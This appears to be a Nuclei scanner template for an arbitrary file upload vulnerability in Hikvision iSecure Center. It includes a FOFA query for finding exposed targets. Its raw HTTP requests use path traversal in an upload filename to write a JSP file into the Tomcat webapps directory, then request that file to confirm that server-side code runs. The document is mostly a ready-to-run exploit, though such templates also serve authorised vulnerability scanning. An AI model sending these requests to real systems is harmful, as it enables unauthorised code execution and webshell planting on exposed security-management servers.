漏洞描述
THikvision iSecure Center /center/api/files;.js has an arbitrary file upload vulnerability
id: hikvision-js-files-upload
info:
name: Hikvision iSecure Center - File Upload
author: Xc1Ym
severity: critical
description: |
THikvision iSecure Center /center/api/files;.js has an arbitrary file upload vulnerability
reference:
- https://zhuanlan.zhihu.com/p/639514473
- https://mp.weixin.qq.com/s/DR9xbwnrpg6YYSTw5pIAhw
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/hikvision-files-upload.yaml
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台"
tags: fileupload,iot,hikvision,intrusive,vuln
variables:
filename: '{{rand_base(6)}}'
payload: '{{rand_base(6)}}'
print: '<%out.print("{{payload}}");%>'
http:
- raw:
- |
POST /center/api/files;.js HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{{filename}}.jsp"
Content-Type:image/jpeg
{{print}}
------WebKitFormBoundarygcflwtei--
- |
GET /clusterMgr/{{filename}}.jsp;.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "{{payload}}")'
condition: and
# digest: 4b0a00483046022100815698b80e92b12ada0f42d832683026349b48c6fedfd26f6dbaba70fa6c9b6a022100afbc7626058b59f658b7963362a374cbeb09c590fbd3176c943e794a837290ec:922c64590222798bb761d5b6d8e72950